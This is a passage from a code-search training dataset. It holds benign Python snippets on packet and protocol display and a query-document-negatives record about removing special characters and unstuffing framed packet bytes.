"def print_info(self):\n \n i = 1\n for pcap_packet in self.pcap_packets:\n print '----------------frame: %d------------' % i\n i += 1\n pcap_packet.ethernet.print_info()\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n print '################# packet in the frame ################'\n pcap_packet.ip.print_info()\n \n #skp the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n print '@@@@@@@@@@@@@@@@@@@ tcp fields @@@@@@@@@@@@@@@@@@@@'\n pcap_packet.tcp.print_info()\n \n print\n #endof for",
"def print_info(self):\n \n i = 1\n for pcap_packet in self.pcap_packets:\n print '----------------frame: %d------------' % i\n i += 1\n pcap_packet.ethernet.print_info()\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n print '################# packet in the frame ################'\n pcap_packet.ip.print_info()\n \n #skp the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n print '@@@@@@@@@@@@@@@@@@@ tcp fields @@@@@@@@@@@@@@@@@@@@'\n pcap_packet.tcp.print_info()\n \n print\n #endof for",
"def action_GetProtocolInfo(self, extract_returns=True):\n arguments = { }\n\n out_params = self._proxy_call_action(\"GetProtocolInfo\", arguments=arguments)\n\n rtn_args = out_params\n if extract_returns:\n rtn_args = [out_params[k] for k in (\"Source\", \"Sink\",)]\n if len(rtn_args) == 1:\n rtn_args = rtn_args[0]\n\n return rtn_args",
"def _build_protocol(self):\n self._protocol = Protocol(Prompt, NEWLINE, self._driver_event)",
"def print_info(self):\n \n print \"\"\"version: %d\\t header_len: %d\\t tos: %s\\t total_len: %d\n id: %s\\t flags_reservedbit: %d\\t flags_dont_fragment: %d\\t flags_more_fragment: %d\n fragment_offset: %d\\t TTL: %d\\t protocol: %s\\t\n header_checksum: %s\\t\n src: %s\\t dst: %s\n opt_paddings: %s\"\"\" % (\n self.version, self.header_len, self.type_of_service, self.total_len, self.id, self.flags_reservedbit, \n self.flags_dont_fragment, self.flags_more_fragment, \n self.fragment_offset, self.TTL, self.protocol, self.header_checksum, self.src, self.dst, repr(self.opt_paddings))",
"def protocols(self) -> pulumi.Output['outputs.ServiceProtocols']:\n return pulumi.get(self, \"protocols\")",
"def print_connection_information(self):\n try:\n print(self.connection_information)\n except:\n print(\"Error in displaying connection information.\")",
"def protocol_names(self):\n l = self.protocols()\n retval = [str(k.name) for k in l]\n return retval",
"def showInfo(self):\n print(\n f\"Preferences: {stripnl(MessageToJson(self.radioConfig.preferences))}\\n\")\n self.showChannels()",
"def sipserver_status(self) -> str:",
"def FlowStatIpProtocol(self):\n\t\treturn self._get_attribute('flowStatIpProtocol')",
"def displayTCP(tcp):\n\n print \"[TCP Header]\"\n print \"\\t Source Port: \" + str(tcp.sport)\n print \"\\t Destination Port: \" + str(tcp.dport)\n print \"\\t Sequence Number: \" + str(tcp.seq)\n print \"\\t Acknowledgment Number: \" + str(tcp.ack)\n print \"\\t Data Offset: \" + str(tcp.dataofs)\n print \"\\t Reserved: \" + str(tcp.reserved)\n print \"\\t Flags: \" + tcp.underlayer.sprintf(\"%TCP.flags%\")\n print \"\\t Window Size: \" + str(tcp.window)\n print \"\\t Checksum: \" + str(tcp.chksum)\n if (tcp.flags & URG):\n print \"\\t Urgent Pointer: \" + str(tcp.window)\n if (tcp.dataofs > 5):\n print \"\\t Options: \" + str(tcp.options)",
"def port_show(switch, port):\n print client.port.show(switch, port)",
"def do_protocol_version(self):\n return \"2\", True",
"def _recv_protocol(self):\n if not self._protocol_recv:\n try:\n data = self._read_bytes(1, timeout=1.0)\n if len(data) == 0:\n self.close()\n raise PipeClosed()\n peer_protocol = struct.unpack('>B', data)[0]\n self._protocol = min(self._protocol or pickle.HIGHEST_PROTOCOL, peer_protocol)\n self._protocol_recv = True\n self._serializer = _PickleSerializer(self._protocol)\n except (OSError, socket.error):\n self.close()\n raise PipeClosed()",
"def printMixData(self):\n\t\tprint \"OPERATED MIXNODE: Name: %s, address: (%d, %s), PubKey: %s\" % (self.name, self.port, self.host, self.pubk)",
"def get_network_protocols(self):\n return self.mycam.devicemgmt.GetNetworkProtocols()",
"def pprint(self):\n ParseHub.pprint(self)",
"def pprint(self):\n ParseHub.pprint(self)",
"def debug_output(self):\n return self._packet.get('debug-output', 'warning')",
"def protocol_output(self, message, req=None):\n try:\n # so, utf16 doubles the size of the FLAP packets, which\n # really limits our max message size. if none of the ordinals\n # are outside the 7bit ascii range, convert to ascii bytes\n if not [ch for ch in message if ord(ch) > 127]:\n message = message.encode('us-ascii')\n\n # i don't know what's going on here anymore.. let's try something\n # completely different!\n message = message.replace('&', '&')\n message = message.replace('<', '<')\n message = message.replace('>', '>')\n message = newline_re.sub('<br>', message)\n\n # AIM reacts indignantly to overlong messages, so we need to\n # wrap. try not to break up html tags injected by colorlib.\n if not hasattr(req, 'chat'):\n req.chat = None\n if not hasattr(req, 'aim'):\n req.aim = self.oscar_connection\n\n if req.chat:\n width = 2048\n func = req.chat.sendMessage\n else:\n width = 2545 # longer than chatrooms, who knows...\n func = req.aim.sendMessage\n\n # unicode stuff takes two bytes due to shitty utf-16\n if isinstance(message, unicode):\n width = int(width / 2) - 1\n\n for line in self.xmlwrap(message, width):\n args = [line]\n if not req.chat:\n if not req.nick:\n req.nick = req.sendto\n args.insert(0, req.nick)\n reactor.callFromThread(func, *args)\n\n # don't spam ourselves off the server\n sleep(1)\n\n except Exception, error:\n self.log.exception(error)",
"def showmessage(self):\n return self.message",
"def showmessage(self):\n return self.message",
"def print_packet(self, pkt):\n ip_layer = pkt.getlayer(IP)\n print(\"[!] New Packet: {src} -> {dst}\".format(src=ip_layer.src, dst=ip_layer.dst))",
"def dataReceived(self, data):\n print \"received:\", data",
"def __str__(self):\n return self.port",
"def ProtocolType(self) -> ProtocolType:",
"def description(self):\n return f'# {self._peer.description}'",
"def _build_protocol(self):\n self._protocol = SBE19Protocol(Prompt, NEWLINE, self._driver_event)",
"def identify_client(self,protocol):\n if protocol.resident:\n return protocol.peer\n #pdb.set_trace()",
"def getLine(self):\r\n # This is important: \r\n # The data that is transmitted over the socket (the entire contents \r\n # of one protocol message will be put into one string of bytes that\r\n # is terminated by exactly one newline character 0x0a at the end.\r\n # \r\n # This string of bytes is what I refer to as the \"line\"\r\n #\r\n # Therefore the entire message data (the contents of ProtocolMsg.blob)\r\n # which can contain any arbitrary byte sequence (even chat messages are \r\n # considered a blob since they are UTF-8 text with arbitrary formatting \r\n # chars) will be properly encoded for transmission in such a way that \r\n # it will not contain any 0x0a bytes anymore.\r\n #\r\n # This is implemented in the functions encodeLF() and decodeLF()\r\n #\r\n # getLine() is called right before transmitting it over the socket\r\n # to produce the \"line\" and the exact inverse operation on the \r\n # receiving side will happen in __init__() when a new message object \r\n # is constructed from the incoming encoded line string. \r\n return \"%s %s\\n\" % (self.command, encodeLF(self.blob))",
"def __repr__(self):\n return f\"{self.host}/{self.iface}\"",
"def protocol(self) -> Optional['ListenerProtocol']:\n return pulumi.get(self, \"protocol\")",
"def protocols(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"protocols\")",
"def _repr_remote(self):\n return \"%s:%d\" % (self.remote_address)",
"def tracker_print(msg: Any) -> None:\n collective.communicator_print(msg)",
"def protocol(ver):\r\n if ver == 1:\r\n return 1\r\n\r\n if ver == 2:\r\n return 2\r\n\r\n\r\n raise ValueError",
"def display_network_architecture(self):\n self.log(\"\\n-------- Network architecture --------\")\n self.log(\"y_res: {}\".format(self.y_res))\n self.log(\"x_res: {}\".format(self.x_res))\n self.log(\"n_input_channels: {}\".format(self.n_input_channels))\n self.log(\"n_output_classes: {}\".format(self.n_output_classes))\n self.log(\"fc1_n_chan: {}\".format(self.fc1_n_chan))\n self.log(\"fc1_dropout: {}\".format(self.fc1_dropout))\n self.log(\"alpha: {}\".format(self.alpha))\n self.log(\"n_samples_trained: {}\".format(self.n_samples_trained))\n for c in range(self.n_output_classes):\n self.log( \" * Class {}, m = {}\".format( \\\n c, self.n_class_samples_trained[c] ) )",
"def __repr__(self):\n return \"{}:{}\".format(self.ip, self.port)",
"def __str__(self):\n from ansys.dpf.core.core import _description\n\n return _description(self._message, self._server)",
"def get_status_line(self):\n return f'{str(self.protocol)} {int(self.status)} {self.status.phrase}'",
"def __ip_protocol(self, proto_num):\n if proto_num in self.protocols:\n return self.protocols[proto_num]\n return str(proto_num)",
"def response(self, data, response_type = \"terminal\"):\n if (response_type == \"terminal\"):\n print(data, end=\"\\n\")",
"def show(self):\n\n print(\"\\n---------------------------------------------------------\")\n\n print(\"\\n{0}\".format(self.name))\n print(\"\\n\\tMonitoring the following Mechanism OutputPorts:\")\n if self.objective_mechanism is None:\n print(\"\\t\\tNone\")\n else:\n for port in self.objective_mechanism.input_ports:\n for projection in port.path_afferents:\n monitored_port = projection.sender\n monitored_port_Mech = projection.sender.owner\n monitored_port_index = self.monitored_output_ports.index(monitored_port)\n\n weight = self.monitored_output_ports_weights_and_exponents[monitored_port_index][0]\n exponent = self.monitored_output_ports_weights_and_exponents[monitored_port_index][1]\n\n print(\"\\t\\t{0}: {1} (exp: {2}; wt: {3})\".\n format(monitored_port_Mech.name, monitored_port.name, weight, exponent))\n\n print(\"\\n\\tModulating the following parameters:\".format(self.name))\n # Sort for consistency of output:\n port_Names_sorted = sorted(self.output_ports.names)\n for port_Name in port_Names_sorted:\n for projection in self.output_ports[port_Name].efferents:\n print(\"\\t\\t{0}: {1}\".format(projection.receiver.owner.name, projection.receiver.name))\n\n print(\"\\n---------------------------------------------------------\")",
"def _build_protocol(self):\n self._protocol = Protocol(MENU, Prompt, NEWLINE, self._driver_event)",
"def transmission(self):\n return 1"
] | [
"0.7430098",
"0.72326285",
"0.72326285",
"0.7058655",
"0.70196545",
"0.694914",
"0.694914",
"0.68412536",
"0.6835205",
"0.67115223",
"0.6701628",
"0.66536134",
"0.66198826",
"0.66198826",
"0.6572238",
"0.642882",
"0.64042336",
"0.6377508",
"0.62557447",
"0.62252337",
"0.6182007",
"0.6182007",
"0.6182007",
"0.6182007",
"0.6182007",
"0.6151151",
"0.6140062",
"0.6099098",
"0.60828763",
"0.6078998",
"0.60441965",
"0.60126865",
"0.59970367",
"0.59405273",
"0.59400046",
"0.5913577",
"0.5849608",
"0.58413535",
"0.5808534",
"0.58025205",
"0.57809514",
"0.5776252",
"0.5761826",
"0.572554",
"0.56994873",
"0.56963205",
"0.5658754",
"0.5633283",
"0.56251365",
"0.5620041",
"0.561534",
"0.560827",
"0.5599502",
"0.5593594",
"0.5591934",
"0.5591934",
"0.5555217",
"0.55264795",
"0.5518062",
"0.5515055",
"0.551498",
"0.5501328",
"0.54905725",
"0.54883033",
"0.5487145",
"0.54742545",
"0.5468446",
"0.54568046",
"0.54292065",
"0.54254824",
"0.5417989",
"0.5404604",
"0.5404604",
"0.5403732",
"0.53801674",
"0.5376197",
"0.5376197",
"0.537476",
"0.5373101",
"0.5366069",
"0.53625137",
"0.53615606",
"0.5353493",
"0.53337336",
"0.5333262",
"0.53293824",
"0.5327784",
"0.53194827",
"0.53167605",
"0.5310121",
"0.5310103",
"0.5298675",
"0.52964956",
"0.5292129",
"0.5279716",
"0.5278387",
"0.52762073",
"0.5275503",
"0.5271957",
"0.5270356"
] | 0.6732168 | 9 |
remove the special characters for stuffing | def __packet_unstuff(self, data):
unstuffed = bytearray()
escape = False
for count in data:
if escape == False:
if count == 0x7e:
continue
if count == 0x7f:
continue
if count == 0x7d:
escape = True
else:
unstuffed.append(count)
else:
unstuffed.append(count + 0x7d)
escape = False
return(unstuffed) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def removeSpecialChars(self) -> None:\n self.text = re.sub('[^a-zA-z0-9\\n\\.\\s]', '', self.text)",
"def _remove_special_chars(self, text: str) -> str:\n pattern = re.compile(self.special_chars_pattern)\n text = re.sub(pattern, \" \", text)\n return text",
"def remove_special_char(self,text):\n modified_text = re.sub(',|;|#,$','',text)\n return modified_text",
"def remove_special_chars(text):\n \n text = re.sub(' +', ' ', re.sub('[^A-Za-z ]+', ' ', text).strip())\n return text",
"def remove_special_characters(string_list):",
"def _remove_special_chars(self, doc: str):\n processed_tweet = re.sub('[\\.,!#¡\\?¿%:;´\"@”“&()\\|]', '', doc)\n return processed_tweet",
"def strip_other_charcter():\n pass",
"def sanitize(text):\n #text = re.sub(r'[*]',r'\\*',text) \n text = re.sub(r'~',r'\\~',text) \n #text = re.sub(r'<',r'\\textless',text) \n #text = re.sub(r'>',r'\\textgreater',text) \n text = re.sub(r'\\|',r'\\|',text) \n text = re.sub(r'_',r'\\\\_',text) \n return text",
"def _remove_special_chars(sentence, replace_with=\"\"):\n sentence = sentence.replace('\\n', replace_with).replace('\\t', replace_with)\n return sentence",
"def remove_punct(self,text):",
"def remove_punctations_fun(self): \n self.doc = re.sub('[^a-zA-Z0-9]', ' ', self.doc)",
"def clean_unnecessary_characters(self, tweet):\n tweet = tweet.lstrip(\"\\\"\").rstrip(\"\\\"\")\n tweet = re.sub(self.compiledAlphanumericRegex, ' ', tweet)\n tweet = tweet.replace('_', ' ')\n return tweet",
"def remove_special_characters(text):\n soup = BeautifulSoup(text, \"html.parser\")\n review = soup.get_text()\n review = r\"[^a-zA-z0-9\\s]\"\n review = re.sub(review, \"\", text)\n return review.lower()",
"def remove_special(s):\n return ansi_escape_chars.sub('', s)",
"def replace_special(text):\r\n text = text.replace('\\r\\n', ' ')\r\n text = text.replace('\\n', ' ')\r\n text = text.replace('``', \"''\")\r\n text = text.replace('`', \"'\")\r\n text = text.replace('“', '\"')\r\n text = text.replace('”', '\"')\r\n text = text.replace('’', \"'\")\r\n text = text.replace('‘', \"'\")\r\n text = text.replace(\"'\", \"'\")\r\n text = text.replace('–', \"-\")\r\n text = text.replace('\\\"', '\"')\r\n text = text.replace(\"\\'\", \"'\")\r\n return text",
"def remove_special_characters_from_text(text) -> str:\n return re.sub(r'[^\\w\\s]', '', text.strip())",
"def _remove_custom_chars(self, text: str) -> str:\n patterns = \"|\".join([x for x in self.custom_chars])\n return re.sub(patterns, \"\", str(text), flags=re.IGNORECASE)",
"def remove_extra_characters(self, text):\n if text:\n parsed_text = text\n parsed_text = parsed_text.replace(\"[\", \"\")\n parsed_text = parsed_text.replace(\"]\", \"\")\n parsed_text = parsed_text.replace(\"{\", \"\")\n parsed_text = parsed_text.replace(\"}\", \"\")\n parsed_text = parsed_text.replace(\"|\", \" \")\n parsed_text = parsed_text.replace(\"-\", \"\")\n parsed_text = parsed_text.replace(\" \", \"\")\n parsed_text = parsed_text.replace(\":'\", \"\")\n parsed_text = parsed_text.replace(\"'\", \"\")\n parsed_text = parsed_text.replace(\"#\", \"\")\n parsed_text = parsed_text.replace(\"':\", \"\")\n parsed_text = parsed_text.replace(\"=\", \"\")\n parsed_text = parsed_text.replace(\"*\", \"\")\n parsed_text = parsed_text.replace(\"/\", \"\")\n parsed_text = parsed_text.replace(\"<--\", \"\")\n parsed_text = parsed_text.replace(\"-->\", \"\")\n parsed_text = parsed_text.replace(\"<!--\", \"\")\n parsed_text = parsed_text.replace(\">\", \"\")\n parsed_text = parsed_text.replace(\"<\", \"\")\n\n parsed_text = parsed_text.replace('__NOTOC__', '')\n\n return parsed_text",
"def remove_specials(sentence):\n sentence = sentence.replace('-', ' ')\n sentence = re.sub(r'[^\\w\\s]', '', sentence)\n return sentence",
"def remove_special_chars(s):\n stripped = re.sub('[^\\w\\s]', ' ', s)\n stripped = re.sub('_', ' ', stripped)\n\n # Make all whitespaces only one space\n stripped = re.sub('\\s+', ' ', stripped)\n\n stripped = stripped.strip()\n\n return stripped",
"def string_cleanup(s, garbage=\":,-()&\"):\n s_new = ''\n for x in s:\n if x not in garbage:\n s_new += x\n\n return s_new",
"def replace_special_chars(self, word):\n try:\n if (self.lang==\"tr\"):\n word = re.sub(u\"\\^db\", u\"+db\", word)\n word = re.sub(u\"\\^\", u\"¬\", word)\n word = re.sub(u\"\\$\", u\"£\", word)\n except UnicodeDecodeError:\n word = ''\n return word",
"def remove_bad_characters(self):\n\n self.categorie_name = self.categorie_name.replace(\"\\n\", \"\")",
"def get_clean_text(messy_text: str) -> str:\n new_text = \"\"\n replace = {\n \"*\": \"\\\"\",\n \"!\": \"?\",\n \"/\": ',',\n \"?\": \"!\"\n }\n remove = \"1234567890&@#$%^()_+|><~\"\n pls_do_upper = False\n for l in messy_text:\n if l in replace:\n new_text += replace[l]\n elif l not in remove:\n if pls_do_upper:\n new_text += l.upper()\n else:\n new_text += l\n return new_text",
"def clean(sent):\n p1 = re.compile('\\W')\n p2 = re.compile('\\s+')\n sent = re.sub(r\"http\\S+\", \"\", sent)\n sent = ReplaceThreeOrMore(sent)\n sent = remove_unicode_diac(sent)\n sent = sent.replace('_', ' ')\n sent = re.sub(r'[A-Za-z0-9]', r'', sent)\n sent = re.sub(p1, ' ', sent)\n sent = re.sub(p2, ' ', sent)\n return sent",
"def cleanup_input(data):\n data = re.sub(r'[^0-9A-Za-z ()_,.-:]', '', data)\n return data",
"def remove_special_chars(sentence):\r\n result = re.sub(r\"[^a-zA-Z0-9.]+\", ' ', re.sub('\\.\\.+', ' ', sentence))\r\n return result",
"def _remove_left_padded_special_chars(self, text: str) -> str:\n pattern = re.compile(\"\\ +[^A-Za-z0-9\\n]\")\n text = re.sub(pattern, \" \", text)\n return text",
"def _strip_text(text):\n text = re.sub(r'[ ,?:]|%s', \"\", text.lower())\n for chr in \"-%\":\n new_text = text.replace(chr, \"\")\n if new_text:\n text = new_text\n return text.lower()",
"def remove_special_characters(text, remove_digits=False):\n pattern = r'[^a-zA-z0-9\\s]' if not remove_digits else r'[^a-zA-z\\s]'\n text = re.sub(pattern, '', text)\n return text",
"def clean(line):\n line = line.strip('\\n').strip()\n line = line.replace('\\xe2\\x80\\x93', '-')\n line = line.replace('\\xe2\\x80\\x99', '\\'')\n\n return line",
"def cleanXMLfromSpecialChars(self,line):\n return str(line).replace(\"&\", \"&\").replace(\"\\\"\",\""\").replace(\"<\",\"<\").replace(\">\",\">\").replace(\"'\",\"'\")",
"def desc_cleanser(self, txt):\n # New line issues\n txt = re.sub(r'\\\\n', r' ', txt)\n # Unicode cleanse\n txt = re.sub(r'\\\\u[\\d]{4}', r'', txt)\n # Remaining unicode cleanse\n txt = re.sub(r'\\\\{1,2}\\S+', r' ', txt)\n # Remove remaining non-alphanumeric and spaces\n txt = ''.join([i for i in txt if i.isalnum() or i.isspace() or i in ['.','?','!']])\n # Remove more than a single space\n txt = re.sub(r'\\s+', r' ', txt)\n\n return txt",
"def _clean(self, text):\n if len(self.alph) == 26:\n text = sub('[\\n\\t ' + string.punctuation + ']+?', '', text)\n else:\n text = sub('[\\n\\t]+?', '', text)\n\n text = text.lower()\n text = text.encode('ascii', 'ignore').decode()\n return text",
"def remove_special_chars(text):\n schars = ''.join([a for a in string.punctuation if a not in \".,?\"])\n\n text = re.sub('[%s]' % re.escape(schars), '', text)\n return text",
"def clean_text(data):\r\n data = data.replace('\\n', ' ') #remove new lines\r\n replace_l = [\"'\",'!','/','\\\\','=',',',':', '<','>','?','.','\"',')','(','|','-','#','*','+', '_'] #list of characters to remove\r\n data = data.lower() #Convert all the words to lower case\r\n for i in replace_l:\r\n data = data.replace(i,' ') #replace words with blank character\r\n return data #return clean data\r",
"def remove_non_alpha(self,text):\n \n removelist=\"-\\.\\/\\?\\@\"\n re_alpha_numeric1=r\"[^0-9a-zA-Z\"+removelist+\" ]\"\n clean_text=re.sub(re_alpha_numeric1,'',text)\n clean_text=clean_text.replace('/',' ')\n clean_text=re.sub(' +', ' ', clean_text)\n return clean_text",
"def _replace_non_alnum(self):\n no_punct = [x if x.isalnum() else ' ' for x in self._phrase.lower()]\n return ''.join(no_punct) # Convert an array of char to string",
"def strip_content(content):\n return ' ' + content.upper().\\\n replace('+','').\\\n replace('\"','').\\\n replace('@','').\\\n replace('-','').\\\n replace('?','').\\\n replace('*',''). \\\n replace('.', '') + ' '",
"def clean_content(self) -> str:",
"def sanitize(wl):\n s = []\n for word in wl:\n for symbol in ['.', '!', ',', '\\n', '\\r', '?']:\n if symbol in word:\n s.append(symbol)\n word = word.replace(symbol, '')\n \n s.append(word)\n return s",
"def remove_string_special_characters(s):\n stripped = re.sub('[^\\w\\s]', '', s)\n stripped = re.sub('_', '', stripped)\n stripped = re.sub('\\s+', ' ', stripped)\n stripped = stripped.strip()\n\n return stripped",
"def cleaner(self, w_old):\n w_new = re.sub('[\\(\\)]', '', w_old)\n w_new = re.sub('[^А-Яа-яЁё ]', 'ъ', w_new)\n w_new = re.sub(' ', ' ', w_new)\n return w_new",
"def replace_bad_characters(self, str):\n\n str = unicode(BeautifulStoneSoup(str,\n convertEntities=BeautifulStoneSoup.HTML_ENTITIES))\n str = unicodedata.normalize('NFKD', str).encode('ascii', 'ignore')\n str = unicode(re.sub('[^\\w\\s-]', '', str).strip().lower())\n str = unicode(str.replace(' ', '-'))\n return str",
"def cleanASJP(word):\n word = re.sub(r\",\", \"-\", word)\n word = re.sub(r\"\\%\", \"\", word)\n word = re.sub(r\"\\*\", \"\", word)\n word = re.sub(r\"\\\"\", \"\", word)\n word = re.sub(r\".~\", \"\", word)\n word = re.sub(r\"(.)(.)(.)\\$\", r\"\\2\", word)\n word = re.sub(r\"\\$\", \"\", word)\n word = re.sub(r\"\\s+\", \"\", word)\n return word.replace('~', '')",
"def cleanUpString(text):\r\n if text is None or text == '':\r\n return text\r\n try:\r\n text = text.encode(\"utf-8\")\r\n except:\r\n newText = \"\"\r\n t = text.decode(\"utf-8\")\r\n for c in t:\r\n newC = c\r\n if ord(c)>127:\r\n newC = \"&#%s;\" % ord(c)\r\n if ord(c)==8211:\r\n #change to this otherwise the toc has – value instead of endash\r\n newC = chr(45)\r\n if ord(c)==160:\r\n # \r\n newC = \" \"\r\n newText += newC\r\n text = newText\r\n text = str(text)\r\n return text",
"def fix_characters(title):\n return re.sub('[^0-9a-zA-Z]+', ' ', title)",
"def clean_txt(txt):\n r = txt.encode(\"utf-8\", errors=\"backslashreplace\").decode('utf-8').replace(\"\\\\u0144\", \"\")\n return r",
"def process_text(text):\n text = re.sub(r'<@>\\s+|<s>\\s+|</s>\\s+|<p>\\s+|</p>\\s+|\\s+\\,|\\'s|\\'|\\;|\\(|\\)|\\-\\-\\s+|\\s+\\.', '', text)\n text = re.sub(r'\\.\\,', '. ,', text)\n text = re.sub(r'\\,', '', text)\n text = re.sub(r'\\$', '$ ', text)\n text = re.sub(r'\\%', ' %', text)\n text = re.sub(r'\\s\\\"\\s', ' ', text)\n text = re.sub(r'\\.\\s+', '. ', text)\n text = text.lower()\n return text",
"def removeApostrophes(self, words):\n\t\treturn self.__apostropheRegex.sub('', words)",
"def _preprocess(self, sent: str) -> str:\n sent = sent.replace(\" \", \"▁\")\n return \" \".join([c for c in sent])",
"def cleantxt(text):\n return ((text.replace(',', '')).replace('/', ' ')).replace('-', ' ')",
"def preprocess(x):\n\n\tres = re.sub(r'[^\\w\\s]', '', x)\n\tres = res.strip('\\n')\n\n\treturn res",
"def clean_text(text):\n\n\n regex = re.compile('[\\.|\\-|\\,|\\?|\\_|\\:|\\\"|\\)|\\(\\)\\/|\\\\|\\>|\\<]')\n text = text.lower() # Turn everything to lower case\n text = regex.sub(' ', text).strip()\n out = re.sub(' +', ' ', text) # Reduce whitespace down to one\n \n return out",
"def preprocess_input(self, text):\n text = re.sub(r\"([^a-zA-Z0-9 -]+ +[^a-zA-Z0-9 -]*|[^a-zA-Z0-9 -]*\" +\n \" +[^a-zA-Z0-9 -]+)\", ' ', text, flags=re.UNICODE)\n text = re.sub(r\"([^a-zA-Z0-9 -]+$|^[^a-zA-Z0-9 -]+)\", '', text)\n text = re.sub(r\"([a-zA-Z0-9 -]+?)([^a-zA-Z0-9 -])([a-zA-Z0-9 -]+?)\",\n r\"\\1'\\3\", text, flags=re.UNICODE)\n text = re.sub(r\"([\\x00-\\x7F -]+?)([^a-zA-Z0-9 -]+)([\\x00-\\x7F -]+?)\",\n r\"\\1'\\3\", text, flags=re.UNICODE).encode(\"utf-8\")\n return re.sub(r\"([^a-zA-Z0-9 \\-\\'])\", '', text, flags=re.UNICODE)",
"def normalize(self, what):\n txt = strippedtxt(what, [\"\\002\", \"\\003\"])\n txt = re.sub(\"\\s+\", \" \", what)\n txt = stripcolor(txt)\n txt = txt.replace(\"\\002\", \"*\")\n txt = txt.replace(\"<b>\", \"*\")\n txt = txt.replace(\"</b>\", \"*\")\n txt = txt.replace(\"<i>\", \"\")\n txt = txt.replace(\"</i>\", \"\")\n txt = txt.replace(\"<b>\", \"*\")\n txt = txt.replace(\"</b>\", \"*\")\n txt = txt.replace(\"<i>\", \"\")\n txt = txt.replace(\"</i>\", \"\")\n return txt",
"def clean_text(self, text):\n return \"\".join((self.SP_CHAR_MAPPING.get(c, c) for c in text))",
"def minimalTextCleaning(row, field):\n\n # force encoding\n encoded_text = row[field].encode(encoding = 'ascii',errors = 'replace')\n decoded_text = encoded_text.decode(encoding='ascii',errors='strict')\n remove_funky_chars = str(decoded_text).replace(\"?\", \" \")\n lower_case = str(remove_funky_chars).lower().strip()\n\n # strip redundant whitespace\n cleaned_text = re.sub(' +', ' ', lower_case)\n\n\n # strip signature lines\n cleaned_text = cleaned_text.replace(\"_\", \"\")\n\n return cleaned_text",
"def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text",
"def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text",
"def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text",
"def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text",
"def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text",
"def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text",
"def remove_escape_characters(text):\n text_removed_escape = list(map(lambda x: x.replace(\"\\\\\", \"\").replace(\"'\", \"\").strip().lower(), re.split(r\"(?<=\\\\)[a-z]{1}\", repr(text))))\n text_removed_extra_spaces = list(filter(lambda x: x != \"\", text_removed_escape))\n return \" \".join(text_removed_extra_spaces)",
"def clean_text(txt):\n\n for symbol in \"\"\".,'?!()/-:;\"\"\":\n txt = txt.replace(symbol, '')\n txt = txt.lower()\n txt = txt.split()\n return txt",
"def _cleanup_text(text):\n prefixChars = \"\"\n suffixChars = \"\"\n if text.startswith(\"-\"):\n prefixChars += \"-\"\n if text.startswith(\"_\"):\n prefixChars += \"_\"\n if text.endswith(\"-\"):\n suffixChars += \"-\"\n if text.endswith(\"_\"):\n suffixChars += \"_\"\n text = text.strip()\n text = text.replace('-', ' ')\n text = text.replace('_', ' ')\n text = text.replace(\"'\", ' ')\n text = re.sub('[ \\t\\r\\n]+', ' ', text) # Any whitespaces to one space.\n text = prefixChars + text + suffixChars\n return text",
"def text_prep(text):\n text1 = text.lower()\n text2 = re.sub('[.,!?\"\\'-\\\\\\/:;1-9+]', ' ', text1)\n text3 = text2.replace('\\n', ' ')\n text4 = re.sub(' +', ' ', text3)\n text_obrab = text4.split()\n return text_obrab",
"def removeNonAsciiFromText(self, text):\n\t\treturn ''.join([i if ord(i) < 128 else '' for i in text])",
"def stripword( s ) :\n return re.sub( '[\\W\\d]', '', s )",
"def sanitize_txt(x):\n return '_'.join(smart_split(x.lower()))",
